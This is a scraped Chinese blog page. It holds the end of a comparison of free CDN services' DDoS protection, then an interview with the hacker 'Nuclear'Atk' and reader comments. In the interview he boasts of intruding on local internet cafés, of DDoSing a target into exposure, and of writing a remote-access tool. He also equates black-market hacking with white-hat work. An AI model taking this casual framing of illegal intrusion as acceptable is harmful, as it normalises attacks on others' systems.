而且进入黑洞后最少断网几个小时,strong攻击者只需要每隔几小时攻击几分钟,你服务器就得黑洞一天,非常的坑!WTF!/strong/p h2 id="360-网站卫士"360 网站卫士/h2 h3 id="优点"优点/h3 p  strong不限流量!!!/strong(赞!国内唯一!)/p p  strong永不回源!!!/strong(赞!国内唯一!)/p p  strong免费版支持 HTTPS!/strong(赞!国内最早、唯一支持 HTTPS 的免费 CDN!)/p p  strong全国共享总 600G/s 防御带宽!/strong(峰值 30G 以上的 DDOS 攻击)/p h3 id="缺点"缺点/h3 p  需要备案,需要审核。(国内所有 CDN 都需要)/p p  因为永不回源,所以很多灰色网站在用,导致攻击非常多,以至于strong整个 CDN 网络非常不稳定/strong!!!一天总有几个小时全国某些地区打不开……/p h3 id="官方问答"官方问答/h3 blockquote p360网站卫士每天加速有流量限制吗,如果超出了,回源会不会暴露网站真实IP?/p pHYTHYT 产品答疑师 发表于 2017-12-4 10:05 有限制,回源会暴露真实IP 360fans_s5Sz57 限制多少G,本人网站一天大概120G左右,这是百度云加速那边加速的数据! HYTHYT 回复360fans_s5Sz57:加速是没有流量限制的,是对网站的缓存空间大小有限制,若超出不会把您的网站回源,只是新的缓存数据会覆盖您的旧缓存数据,因此不用担心流量超出会暴露真实IP的问题。/p p全国各地总 600G 带宽机房部署”是真的吗?/p p答:千真万确!!千真万确!!千真万确!!(重要的事情说三遍)360网站卫士采用协同防护的方式, 当你网站受到攻击时,通过部署在全国各地的高防节点,将攻击流量分散到各省的集群清洗中心,利用大型流量清洗设备实时过滤 DDoS 流量, 识别并放过真实的访客流量,从而达到保护你网站免受大流量攻击的作用。/p p问题2. 600GB流量防护是共享还是独享,足够那么多网站使用么?/p p答:600GB是共享最大值,大部分CDN服务商都不可能做到给每个网站独享大流量防护的本事,一般企业也无法承担起独享大流量防护的费用。 新闻中,大家看到的上百GB甚至是几个TB的流量并不是指 1秒 内就有如此大的流量攻击,DDoS流量并发是一个不断上升的过程。 360通过多年的安全技术积累,保证了在DDoS流量在上升过程中及时压制、锁死,通俗地讲就是“来一波,死一波”,让每秒的流量保持在涓涓细流的范围。 当然,如果真的有并发流量我们也不怕,目前世界记录的最大流量是 500GB/小时(该数据统计截止于2016年8月),这样说来,网站卫士的流量防护储备早已破世界纪录了呢!/p p问题4. 如果网站被攻击流量过大,可能是非常大,360网站卫士会回源处理吗?/p p答:当流量过大时,360网站卫士监测中心报警启动,我们会及时排查“出事”网站,如果该网站是正规内容,我们将坚守使命,继续为你防护,永不回源!!! 但是,如果你的网站是我们所禁止(之前未被发现)的违规网站,我们将做下线甚至是拉黑处理。/p /blockquote h2 id="加速乐"加速乐/h2 h3 id="免费套餐"免费套餐/h3 p  HTTP端口:仅限80端口/p p  超量措施:回源≥6小时(strong坑/strong)/p p  加速流量:3600GB/月/p p  加速流量峰值:5GB/小时(120GB/天)/p h3 id="ddos-防御"DDOS 防御/h3 p  DDOS 免费版防御峰值 2G/s(strong比较弱/strong),strong超过回源(坑)/strong。(来自客服)/p h3 id="流量计算规则"流量计算规则/h3 p  DDOS 攻击也是算在加速流量里的。(strong大坑/strong)/p p  超过防御的流量攻击根据拦截到的 IP 数量每个 IP 扣除 1GB 流量,超过回源。/p p  超过防御的 CC 攻击部分采用每 10 个 IP 扣除 1GB 的方式进行流量扣除,超过回源。/p h3 id="缺点-1"缺点/h3 p  节点单一,比较少。/p h2 id="百度云加速"百度云加速/h2 h3 id="免费套餐-1"免费套餐/h3 p  节点数量:6-12/p p  套餐流量:10G/天(去年是 50GB/天、1500GB/月)/p h3 id="ddos-防御-1"DDOS 防御/h3 p  DDOS 免费版防御是 5G/S 峰值,超过回源。/p h3 id="优点-1"优点/h3 p  节点比较多,速度比较快。/p p  strong支持泛解析!(*.lcx.cc)/strong/p h2 id="上海云盾"上海云盾/h2 p  strong免费版支持 Https!/strong/p p  云加速一个月赠送 50G 流量,超出 0.15 元每 G,strong没有 DDOS 防御。/strong/p h2 id="腾讯云"腾讯云/h2 p  首次开通后,腾讯云系统会自动送 6 个月每月 50G 的流量包(也就是strong只免费半年/strong),并且支持 HTTPS 服务。不过现在免费活动好像没了,也没有用过,鹅厂免费服务比较小气,没有过多了解。/p h2 id="参考资料"参考资料/h2 p  a href="https://help.aliyun.com/knowledge_detail/40053.html"阿里云,云虚拟主机 DDoS 防护黑洞阈值/a/p p  a href="https://help.aliyun.com/knowledge_detail/40033.html"阿里云,云盾 DDoS 基础防护黑洞阈值/a/p p  a href="https://www.yunaq.com/jsl/"加速乐,知道创宇云安全 CDN 服务,套餐详情/a/p p  a href="http://wangzhan.360.com/"360 网站卫士,免费 CDN 云加速/a/p p  a href="http://su.baidu.com/plan.html"百度云加速,套餐版本介绍/a/p p  a href="https://www.yundun.com/cloud-speed"上海云盾 CDN 云加速/a/p p  a href="https://cloud.tencent.com/"腾讯云免费 CDN/a/p

【原稿】专访知名民间黑客“核攻击”:在自己的道路上,谱写自己的传奇

✇Nuclear'Atk(核攻击)网络安全实验室
2015年12月16日 15:23
p style="text-indent:2em;" 最近一直比较忙,没多余时间更新、管理博客,今天抽时间记录一下…… /p p style="text-indent:2em;" 这篇采访稿出来有一段时间了,前几天 T00ls.Net、和 FreeBuf.COM 进行了发布: /p p style="text-indent:2em;" strongT00ls.Net:/strong /p p style="text-indent:2em;" 2015-12-10 15:11 官网文章:a href="https://www.t00ls.net/thread-32390-1-1.html" target="_blank"专访民间黑客核攻击:在自己的道路上,谱写自己的传奇【T00ls人物专访第四期】/a /p p style="text-indent:2em;" 2015-12-12 微信公众账号:a href="http://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==mid=401065920idx=1sn=c5595701c477129d540995b0fca53e66scene=0#wechat_redirect" target="_blank"专访民间黑客核攻击:在自己的道路上,谱写自己的传奇/a /p p style="text-indent:2em;" strongFreeBuf.COM:/strong /p p style="text-indent:2em;" 2015-12-13 官网文章:a href="http://www.freebuf.com/news/89379.html" target="_blank"专访知名民间黑客“核攻击”:在自己的道路上,谱写自己的传奇/a /p p style="text-indent:2em;" 2015-12-13 微信公众账号:a href="http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==mid=401074280idx=4sn=e1b391f7a3f72ba98cd21e05667e6853scene=0#wechat_redirect" target="_blank"专访知名民间黑客“核攻击”:在自己的道路上,谱写自己的传奇/a /p p style="text-indent:2em;" 本文章由土司论坛(T00ls.Net)策划,T00ls 假说(js@t00ls.net)撰稿,在 T00ls、FreeBuf 都有发布,内容略有修改,以下为未修改原稿,留作记录。 /p hr / p align="center" a href="https://lcx.cc/file/old/4748_pic.jpg" target="_blank"img title="【原稿】专访知名民间黑客“核攻击”:在自己的道路上,谱写自己的传奇" alt="【原稿】专访知名民间黑客“核攻击”:在自己的道路上,谱写自己的传奇" src="https://lcx.cc/file/old/4748_pic.jpg" width="780" height="439" //a /p p style="text-indent:2em;" strong【自述】/strong /p p style="text-indent:2em;" 没有富二代的财富, /p p style="text-indent:2em;" 没有官二代的背景, /p p style="text-indent:2em;" 也没有军二代的后盾…… /p p style="text-indent:2em;" 我,核攻击,来自中国大西北一处普通的小山村,一个纯种屌丝~ /p p style="text-indent:2em;" 小时候的记忆已日渐模糊, /p p style="text-indent:2em;" 但依稀记得,那些年,那个家,还是全村著名的贫困户,以及每逢过年过节来讨债的大叔…… /p p style="text-indent:2em;" 不过,小时候学习还算争气,常年霸占年级前三,家里的土坯墙也因为贴满了各种奖状,显得金碧辉煌许多。 /p p style="text-indent:2em;" 上学追逐戏闹,放学下河捉蟹,晚上在大户人家里蹭黑白电视看动画片…… /p p style="text-indent:2em;" 时光匆匆,岁月如梭,一晃眼到了初中时代…… /p p style="text-indent:2em;" 不负众望,如愿考上了当时县里名牌中学。 /p p style="text-indent:2em;" 进了大县城,入了新学校,也在初一的微机课上第一次摸到了只在黑白电视中见过的计算机,头次知道还有电脑这种神奇的东西! /p p style="text-indent:2em;" 从此对它产生了浓厚的兴趣,闲暇时间翻阅各种教科书,逐行逐字看的如痴如醉。 /p p style="text-indent:2em;" 课桌上的初中《信息技术》已快被翻烂,里边写满了各种笔记以及自己的心得体会,还在空白处手算二进制、八进制、十进制、十六进制,估计全校就我一个这么干吧,其他人都撕了折飞机…… /p p style="text-indent:2em;" 那时,每周最期待的事情就是上微机课,每次遇到新的问题、知识,就等着在下周的微机课上实践,当时一周只有一节课,有时还被其他老师占了…… /p p style="text-indent:2em;" 后来,应该是在初二吧,在 Word 97 中用 Visual Basic 语言写了人生中的第一个“hello, world”程序,当它成功运行时,兴奋了好几天! /p p style="text-indent:2em;" 再后来,渐渐地有了十块八块的零花钱,有次在报刊亭看新出的故事会,偶然间瞅到了一本关于黑客的杂志,当时还不知道黑客是什么,只是看到封面和计算机知识有关,一咬牙,拿一周的零食换了这本杂志回来!!! /p p style="text-indent:2em;" 然后放学火速奔回家,一头扎进去,一直看到半夜才看完,知识第一次被颠覆,原来计算机世界这么大!!! /p p style="text-indent:2em;" 从此一发不可收拾,什么《黑客X档案》、《黑客防线》、《黑客手册》、《大众电脑》之类的每周必买,当时只有一个报刊亭卖,每次还只有两三本,去迟了就没了! /p p style="text-indent:2em;" 然后白天就在学校偷偷翻杂志,把一些重要的知识点写在笔记本上,死记硬背书里的 cmd 命令,放学、放假去网吧实践…… /p p style="text-indent:2em;" 每周的书刊都翻了又翻,里边做满了笔记,翻完杂志又去逛杂志官网论坛,自己没有电脑读取附带的光盘内容,就去下载别人发布的光盘镜像,玩那些软件玩的不亦乐乎,书籍一直保留到现在也没舍得卖。 /p p style="text-indent:2em;" 一直买了一两年,直到后来觉得书里的内容太菜了,就再也没买了,后来互联网媒体时代到来,对传统纸质媒体产生冲击,这些书刊有些只出电子版了,大部分直接绝刊倒闭了! /p p style="text-indent:2em;" 这些书刊对当时的我影响很大,知识在一两年之中突飞猛进,渐渐地在当地小有名气,还收了好几个徒弟,入侵过本地几乎所有网吧,然后这些网吧老板、网管都认得我了,去上网都跟防贼似的看着,当然,也有些最后混成了朋友…… /p p style="text-indent:2em;" 岁月匆匆,一晃眼,已步入了高二的学堂…… /p p style="text-indent:2em;" 这一年,发生了许多事,家里的变故,再加上也没有钱继续交学费,于是就彻底告别了学生生涯,十几岁的我匆匆步入社会,开始赚钱养家…… /p p style="text-indent:2em;" 没有任何社会经验,也没有任何工作能力,一个十几岁的未成年穷屌丝学生能干啥? /p p style="text-indent:2em;" 最初的几个月都在网吧包夜度过,做着黑产大牛一夜暴富的梦,混时度日,对未来一片渺茫…… /p p style="text-indent:2em;" 数月后,在别人的介绍下,在某网吧开始当网管,一个月工资只有五百多,很低很低,只够吃饱饭,但是每天可以长时间免费上网,这令我很开心,毕竟当时网费还是很贵的…… /p p style="text-indent:2em;" 于是,在这个嘈杂、肮脏、混乱不堪的环境中,度过了我人生中很重要的一段学习时光…… /p p style="text-indent:2em;" 以前对硬件一窍不通,现在天天修机维护,造就了我对硬件的精通,各种疑难杂症手到病除,积累了丰富的底层硬件知识。 /p p style="text-indent:2em;" 这是我黑客生涯最活跃、最巅峰的一段时间,白天端茶泡面、搽桌扫地、修机维护,见识社会各色人等,晚上通宵奋战,横行于各大黑客论坛之中…… /p p style="text-indent:2em;" 也就是在这时结识了蹒跚学步的 t00ls、吾爱破解、看雪、绿色兵团,以及各类杂七杂八的技术论坛,什么黑客动画吧、黑客基地、黑鹰、Dir溢出的红客联盟,只要是个黑客技术网站,就都有我的足迹,甚至还开了个网站叫“巅峰黑客”(现在看起来,真他丫的SB!-_-!!!)! /p p style="text-indent:2em;" 凭着过硬的技术、雄厚的实力,在 oldjun(老君)的邀请下,混进了 t00ls 核心圈子,还当上了版主,后来因为年轻气盛和某核心成员吵架,又被赶出核心圈,至今保留一个荣誉会员称号…… /p p style="text-indent:2em;" 那个时期,编写、发布过很多软件,可能有人还记得在 t00ls 发布的“全球首款B/S构架远控 Network Rat v8.0”,没错,那个是在网吧连续通宵三五天写出来的!但现在看起来,就像是个玩具…… /p p style="text-indent:2em;" 在网吧的学习生涯,每天都像打了鸡血,知识面涉猎之广,连现在的我都感到恐怖,同时也赋予了我极其丰富的各类知识。 /p p style="text-indent:2em;" 就这样,没日没夜丧心病狂的活着…… /p p style="text-indent:2em;" 时间一晃,一半年过去了,随着在黑客圈知名度的增加,以及技术实力的增强,手里也渐渐地攒了一些钱,终于凑够钱买了人生第一台电脑!某款杂牌机!!! /p p style="text-indent:2em;" 之后就很少去网吧了,而是蜷缩在县城某个城中村出租屋的黑暗小角落里,用着自己新买的电脑潜心研究,脱去浮躁,慢慢向真正的技术大牛进化,足不出户,不知世上是何年…… /p p style="text-indent:2em;" 花开花落,果生果熟,叶出叶红,叶凋雪落,又一年过去了…… /p p style="text-indent:2em;" 在这期间丰富了更多新的知识,建立了个人小站:a href="https://lcx.cc/" target="_blank"https://lcx.cc//a,一直运行到现在,同时也见证了乌云的崛起。 /p p style="text-indent:2em;" 后来,机缘巧合,认识了一些公司老总,在贵人大力邀请之下,告别蜷缩了几载的小小出租屋,正式进入搬砖生涯…… /p p style="text-indent:2em;" 再后来,这些年,一直走南闯北,手里也渐渐的有了些积蓄,生活也更舒适一点了…… /p p style="text-indent:2em;" 然后,然后就没有了…… /p p style="text-indent:2em;" (完) /p p style="text-indent:2em;" (注:以上内容纯属虚构,如有雷同,绝无可能!) /p p style="text-indent:2em;" ---------- /p p style="text-indent:2em;" 写在最后: /p p style="text-indent:2em;" 正是因为对自己变态的要求,才造就了自己的现在,做!就要做第一! /p p style="text-indent:2em;" 我们现在还很年轻,人生的轨迹,也才刚刚开始。 /p p style="text-indent:2em;" 这个世界,从来就没有什么公正、平等! /p p style="text-indent:2em;" 既然没有含着金汤勺出生,就更要付出常人千倍、万倍的努力! /p p style="text-indent:2em;" 在自己的道路上,谱写自己的传奇! /p hr / p strong【1】自己的故事:/strong /p p style="text-indent:2em;" 1.基本信息,做过那些牛掰的事儿?感觉最有成就感的一件事是什么? /p p style="text-indent:2em;" 牛掰的事情嘛,干过挺多的(lcx.cc 上有很多相关文章),最有成就感嘛,那当然是创立 a href="https://lcx.cc/" target="_blank"https://lcx.cc//a 。 /p p style="text-indent:2em;" 2.网名是怎么来的?核总这头像啥意识?用了这么多年,有什么寓意? /p p style="text-indent:2em;" 其实我最早网名不叫“Nuclear'Atk(核攻击)”,而是“Hacker'Rose”,后来和 t00ls 核心吵架,那个号封了,然后新注册了一个,想着起个牛逼独特的网名,正巧看到百度新闻“…核攻击…”,就用了…… /p p style="text-indent:2em;" 后来也没改过,就用了这么多年,至于寓意,在博客也说过(a href="https://lcx.cc/post/1/" target="_blank"https://lcx.cc/post/1//a),其实很简单,引用原文: /p p style="text-indent:2em;" ********** /p p style="text-indent:2em;" 英文:Nuclear'Atk /p p style="text-indent:2em;" 中文:核攻击 /p p style="text-indent:2em;" 英文网名拆开的意思是: /p p style="text-indent:2em;" Nuclear:英语单词,1. 核,核子,核能,2. 核心的,中心的,3. 原子核的,原子能的,原子弹的。 /p p style="text-indent:2em;" ':半角单引号,用来判断注入的经典符号,这里用来做连接符、分割符。 /p p style="text-indent:2em;" Atk:英语单词 Attack 的缩写,意思为:1. 进攻,袭击,2. 攻击,打击,攻,攻打,3. 抨击,责难 /p p style="text-indent:2em;" 有时当某些网站禁止使用单引号的时候,还用过:NuclearAtk、Nuclear-Atk、Nuclear_Atk 等昵称。 /p p style="text-indent:2em;" 2010 年以前用的网名为:HackerRose,带“er”的,不是“HackRose”。 /p p style="text-indent:2em;" ********** /p p style="text-indent:2em;" 头像取自十几年前的一部电影《地心毁灭》,电影末尾老鼠黑客(Rat)开发的一款软件中的logo,截图提取出来,再配上电影《黑客帝国3》的壁纸作为背景,就成了现在的头像。 /p p style="text-indent:2em;" 有眼尖的朋友发现,头像中有两个单词“Network”、“Rat”,后来也被我作为一款远控的名字了(见自述)。 /p p style="text-indent:2em;" 黑客帝国3 影视壁纸,下载地址:a href="https://lcx.cc/file/old/1762_黑客帝国3 影视壁纸.jpg" target="_blank"https://lcx.cc/file/old/1762_黑客帝国3 影视壁纸.jpg/a /p p style="text-indent:2em;" 3.何时开始学习的黑客技术,因为什么喜欢上了黑客? /p p style="text-indent:2em;" 嗯,在自述里详细讲了,初中。 /p p style="text-indent:2em;" 4.在学的过程中遇到过那些有趣,兴奋,激动的故事,有那些比较印象深刻的事情? /p p style="text-indent:2em;" 嗯,这个在自述里有详细说。 /p p style="text-indent:2em;" 5.最开始学习技术的时候是通过什么样的方法学习的?现在呢? /p p style="text-indent:2em;" 嗯,这个在自述里有详细说。 /p p style="text-indent:2em;" 6.渗透最久的站用了用了多长时间,最后怎么搞定的? /p p style="text-indent:2em;" 最久的,断断续续几个月吧,最后 DDOS 迫使其更换服务器,然后你懂得…… /p p style="text-indent:2em;" 7.当你感觉到瓶颈的时候你是怎么做的? /p p style="text-indent:2em;" 换个思路,绕出来,再从另一入口进,山穷水尽疑无路,柳暗花明又一村~ /p p style="text-indent:2em;" 8.在那些论坛组织学习过?写过那些黑客工具? /p p style="text-indent:2em;" 噢噢,这个太多了,自述里详细写过一部分,工具嘛,更多了,具体参考 a href="https://lcx.cc/"https://lcx.cc//a。 /p p style="text-indent:2em;" 9.在没发家致富的时候是怎么平衡现实需求和技术追求的?是否有时间不够用的情况? /p p style="text-indent:2em;" 参考自述内容…… /p p style="text-indent:2em;" 10.家长对你学习黑客技术持有什么样的态度?亲朋好友之间有学习黑客技术的吗? /p p style="text-indent:2em;" 因为对这个并不懂,但作为一门技术来说,持支持态度。 /p p style="text-indent:2em;" 部分好友有学习。 /p p style="text-indent:2em;" 11.还有什么其他的兴趣爱好吗?业余时间做什么?在黑客领域之外,还关注那些领域的知识? /p p style="text-indent:2em;" 兴趣爱好很多,音乐、游戏、电影、摄影、写作等……关注的领域也很多,主要是科技之类的。 /p p style="text-indent:2em;" 12.谈谈大家很关心的避免水表的经验,如何保护自己? /p p style="text-indent:2em;" 这个问题面太广,完全可以独立写一本书,简单的说的话,把真实身份和虚拟身份隔离使用。 /p p style="text-indent:2em;" 更多保护自己的知识可以参考:a href="https://lcx.cc/" target="_blank"https://lcx.cc//a /p p strong【2】核攻击的生存现状/strong /p p style="text-indent:2em;" 1.核总现在结婚了吗?孩子几岁了?爱人是做什么的呢? /p p style="text-indent:2em;" 结婚嘛,现在太年轻,太早!女友嘛,这是个奢侈品,不敢拥有~ /p p style="text-indent:2em;" 2.觉得做WEB的10后挣钱方向是啥? /p p style="text-indent:2em;" 这个不敢妄下评论,我感觉应该是移动端吧。 /p p style="text-indent:2em;" 3.现在的状况是什么样的?未来的打算是什么样的? /p p style="text-indent:2em;" 现在状况么?在某食品行业搬砖! /p p style="text-indent:2em;" 未来打算么?谱写自己的传奇!-_-!!! /p p style="text-indent:2em;" 4.核总技术做了多久?现在做的是技术还是管理? /p p style="text-indent:2em;" 网络安全经验,大概有十年了。 /p p style="text-indent:2em;" 现在技术管理都做,以后可能转型为管理吧。 /p p strong【3】对当前网络、信息安全的看法/strong /p p style="text-indent:2em;" 1.网络安全事故频发,你如何看? /p p style="text-indent:2em;" 任何行业都有安全事故,控制在安全的度里即可。 /p p style="text-indent:2em;" 网络安全近几年由于媒体热炒,再加上技术广泛化,就暴露很多问题了,等过了这个时期,全民安全水平提高,就不会有那么多安全问题了。 /p p style="text-indent:2em;" 2.对现在的国内安全现状和未来的趋势有什么见解? /p p style="text-indent:2em;" 国内安全现状嘛,个人感觉很混乱,毕竟是一个新兴的行业,还没有发展出自己的规则。未来应该会整合、规则化。 /p p style="text-indent:2em;" 3.国内外的企业应该怎么样避免这些事件的再次发生? /p p style="text-indent:2em;" 对企业接触不多,不敢妄下评论。但肯定要学习经验、亡羊补牢。 /p p style="text-indent:2em;" 4.对黑产和白帽子的看法是什么? /p p style="text-indent:2em;" 两者本质没有区别,都是靠技术生存,只是途径不一样。 /p p style="text-indent:2em;" 5.您能否从自己的角度说下现今国内黑产现状与模式以及未来的发展趋势? /p p style="text-indent:2em;" 这个问题太大,就我个人观点,现在国家政策等原因,未来小鱼小虾会消失,只留下大玩家继续玩,手段也会更隐蔽,但永远都不会消失。 /p p style="text-indent:2em;" 6.有人说黑客圈技术环境变了,在你看来之前的环境是怎么样的,现在的环境是怎么样的? /p p style="text-indent:2em;" 改变是肯定的,前几年行业新兴,泡沫太大,普遍浮躁,现在泡沫基本消散了,也都静下心了。 /p p style="text-indent:2em;" 7.健康的技术环境应该是怎么样的? /p p style="text-indent:2em;" 那要看你如何定义“健康”了。 /p p style="text-indent:2em;" 8.黑客需要一个什么样的环境?国家,企业,社会,媒体,个人应该怎么做? /p p style="text-indent:2em;" 嗯,无限零食供应,超高配置设备,舒适的工作环境,几个极品妹纸助手,嗯,一定是这样的环境! /p p style="text-indent:2em;" 国家,出台政策,使它逐渐正规化,像过渡到白帽子一样,合法的研究技术。 /p p style="text-indent:2em;" 企业,正视自身网络安全问题,加强自身防范,而不是单方面指责黑客行为。 /p p style="text-indent:2em;" 媒体,合理引导社会舆论。 /p p style="text-indent:2em;" 个人,转职…… /p p style="text-indent:2em;" 9.在安全行业百家争鸣的时代,核总最看好的是哪个方向呢?大数据安全分析?威胁情报?可视化安全?or等等。核总怎么看? /p p style="text-indent:2em;" 每个方向都各有所长、各有优缺,不能进行简单比较。 /p p style="text-indent:2em;" 我觉得未来大数据分析预测,应该是主流方向。 /p p style="text-indent:2em;" 这里说的不是这些企业搞得那些“概念大数据”,而是将整个社会各行各业数据进行整合分析,虚拟一个世界运行,预测未来发生的事,就像《美国队长》中的洞察计划、《少数派报告》一样,预测犯罪、事故、灾难的发生,并将其消灭在萌芽中,这是很有价值也是很恐怖的一件事。 /p p style="text-indent:2em;" 咳!扯远了…… /p p style="text-indent:2em;" 10.关于信息安全这个行业,核总毕竟也是行业大佬了,眼光肯定很独到,就近几年来看,安全产业发展得也算挺红火,市场需求量也在逐渐增加,政府和大众的重视程度也在提升,这是否就意味着安全行业的未来发展形势会很好,不会受到传说中的互联网寒冬的影响? /p p style="text-indent:2em;" 这个问题很难回答,我等屌丝也无法预测这类问题。 /p p style="text-indent:2em;" 安全行业是基于企业安全需求的,企业有需求就不会有寒冬,安全行业是个新兴行业,还在发展中,很难预料。 /p p strong【4】对将要踏入信息安全行业的新朋友们提一些建议/strong /p p style="text-indent:2em;" 1.针对现今网络安全人士,会点渗透,刚大学毕业,开口就要15-40k月薪的看法。小伙伴们毕业没多久,经验不足。但是开口就是几十几十k的要,真敢开口啊。互联网安全行业现在就是泡沫行业吗? 有一天会突然一下的 破了吗?那些没有CISSP,CISP,CISA,Security+ 等等的人,没工作过,以前都是玩CTF长大的孩子们,他们哪里来的勇气?就敢狮子大开口?希望核总发表下核心建议。我们这年头,做安全行业的招聘也好难啊。 /p p style="text-indent:2em;" 无论哪个行业,都不缺刚毕业狮子大开口的愣头青。 /p p style="text-indent:2em;" 很少在安全公司混,这个我没有发言权,就不瞎指点了。 /p p style="text-indent:2em;" 嗯,我也没有那些证。亲,我高中都没毕业,贵公司要吗? /p p style="text-indent:2em;" 2.渗透工程师行业将来的前景如何?核总能否就渗透相关的职业发表些看法。比如做安全服务(乙方)的,做某产的,成为某家公司的安全团队做维护该公司安全问题(算安全运维了?)的,以及为政府效力做境外目标的。就渗透而言,表弟见识短浅,觉得基本也就这几个职业了(求指点)?然后这些职业分别的优劣在哪些地方? /p p style="text-indent:2em;" 没在乙方待过,听乙方朋友们说,貌似都很累、甲方都很操蛋,想打人,俩字:蛋疼。 /p p style="text-indent:2em;" 某产么,靠实力吃饭,金子满地有,看你有没有本事活着带出来。现在政策越来越严,估计死的人更多了吧。行业整体呈现龟缩状态,将面临新一轮的洗牌。 /p p style="text-indent:2em;" 安全运维么,没待过,感觉相对乙方应该轻松点,据说是祖传背锅的。 /p p style="text-indent:2em;" 国家队,也没待过,涉密单位,进去的朋友再也没出来过,人间蒸发了,嘘~ /p p style="text-indent:2em;" 3.觉得渗透火候差不多了,想要接着提升安全技术,避免不走弯路的路该怎么走呢(下一阶段学啥最靠谱)? /p p style="text-indent:2em;" 学着如何防御被渗透,将会接触更多知识面,碰到更复杂困难的问题。 /p p style="text-indent:2em;" 4.荐一些性价比高或者值得拥有的技术方面的书吧,越多越好哈哈。以及核总涉猎的方面的内容简单说一下,对于技术应该怎么学习? /p p style="text-indent:2em;" 这些年基本没看书,有问题直接百度、谷歌,所以不知如何推荐。 /p p style="text-indent:2em;" 学习技术,面很广,我感觉,挑自己感兴趣的方向入手即可,兴趣是学习的动力! /p p style="text-indent:2em;" 5.有时候会不会觉得搞安全是一个坑?刚开始学习安全需要实践,但是现实是没有什么好的测试环境供大家实践,只有到处找SQL注入点,到处找XSS点,各种洞,各种点,以求技术上有所突破,但这样有可能会惹上官司,搞不好还要进去蹲上两年,安全处处充满坑,请问核总如何看待? /p p style="text-indent:2em;" 嗯,所以我转职做食品行业了…… -_-!!! /p p strong【5】朋友眼中的核攻击/strong /p p style="text-indent:2em;" 这个看文章发布后的评论就知道了…… /p p style="text-indent:2em;" 摘录部分: /p p style="text-indent:2em;" depycode:核总为人很稳重,很有大哥气质。技术很扎实,涉猎广泛深入。从他博客学到很多东西,很感谢核总。 /p p style="text-indent:2em;" 耶稣:喜欢研究东西,,非常低调,知识非常的全面,在他的博客上面学习到了不少的经验,都是他认真思考后发的,可以学到很多。 /p p style="text-indent:2em;" lmy:核大大是一个很有趣的胖子,身边美女众多……此处省略一万字,重点是软硬都精,软到分分钟来场核风暴,硬到分分钟让你车熄火…借此也感谢核大大帮兄弟解决不少头疼问题… /p p style="text-indent:2em;" cond0r:性格比较严肃,不容易接近,但是在技术方面很有钻研精神,有什么问题总要研究出一个所以然来,也乐意分享。 /p p style="text-indent:2em;" T00ls.Net 评论:a href="https://www.t00ls.net/thread-32390-1-1.html" target="_blank"https://www.t00ls.net/thread-32390-1-1.html/a /p p style="text-indent:2em;" FreeBuf.COM 评论:a href="http://www.freebuf.com/news/89379.html" target="_blank"http://www.freebuf.com/news/89379.html/a /p pstrong留言评论(旧系统):/strong/p div style="max-height:600px;width:100%;overflow:auto;overflow-x:hidden;" blockquote id="8062,4582,43.226.121.13" p失名 @ 2015-12-14 18:47:04/p p style="text-indent:2em"看到核总的专访了,特地发来贺电 ╮(╯▽╰)╭/p p本站回复:/p p style="text-indent:2em"感谢!感谢!!!/p /blockquote blockquote id="8068,4582,106.186.115.133" p佚名 @ 2015-12-16 16:13:09/p p style="text-indent:2em"核总威武,以核总为方向,努力ing.../p p本站回复:/p p style="text-indent:2em"加油!/p /blockquote blockquote id="8069,4582,203.100.94.151" p0xLucifer @ 2015-12-16 16:44:30/p p style="text-indent:2em"0xLucifer发来贺电!/p p本站回复:/p p style="text-indent:2em"感谢!/p /blockquote blockquote id="8071,4582,14.215.76.1" pdelectate @ 2015-12-16 19:59:50/p p style="text-indent:2em"《黑X》早就没了,《黑防》最早还分两册,现在也停刊了貌似(电子版也不出了),纸质版只收藏到2010-06。 这条路,不好走。/p p本站回复:/p p style="text-indent:2em"是滴 +1/p /blockquote blockquote id="8073,4582,14.23.48.235" p佚名 @ 2015-12-17 12:04:27/p p style="text-indent:2em"核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总 核总/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8075,4582,106.39.47.162" pUnicorn @ 2015-12-17 18:54:35/p p style="text-indent:2em"正是因为对自己变态的要求,才造就了自己的现在,做!就要做第一! 我们现在还很年轻,人生的轨迹,也才刚刚开始。 这个世界,从来就没有什么公正、平等! 既然没有含着金汤勺出生,就更要付出常人千倍、万倍的努力! 在自己的道路上,谱写自己的传奇! --这段话振聋发聩! 前辈,学习了!/p p本站回复:/p p style="text-indent:2em"good good study, day day up!/p /blockquote blockquote id="8080,4582,119.145.202.150" p佚名 @ 2015-12-18 17:09:51/p p style="text-indent:2em"核总威武,我以为你自己给自己做的专访呢。。。/p p本站回复:/p p style="text-indent:2em"-_-!!!/p /blockquote blockquote id="8081,4582,58.61.235.226" payiis @ 2015-12-18 21:53:32/p p style="text-indent:2em"核总,核大,蛋大,JB大,haha/p p本站回复:/p p style="text-indent:2em"同大、同大!-_-!!!/p /blockquote blockquote id="8082,4582,117.12.153.56" pJoyce @ 2015-12-18 21:54:59/p p style="text-indent:2em"核总威武/p p本站回复:/p p style="text-indent:2em"感谢!/p /blockquote blockquote id="8087,4582,58.241.42.83" p佚名 @ 2015-12-22 16:05:44/p p style="text-indent:2em"看了核总的经历好励志!祝核总早日结婚,早生贵子!!!!!!!!!!!!!!!!!!!!!!!!!!/p p本站回复:/p p style="text-indent:2em"感谢支持!/p /blockquote blockquote id="8089,4582,106.59.224.168" p佚名 @ 2015-12-22 19:19:59/p p style="text-indent:2em"请在这里填写留言内容,最长不超过 1000 字。/p p本站回复:/p p style="text-indent:2em"[暂无回复]/p /blockquote blockquote id="8091,4582,123.56.128.44" 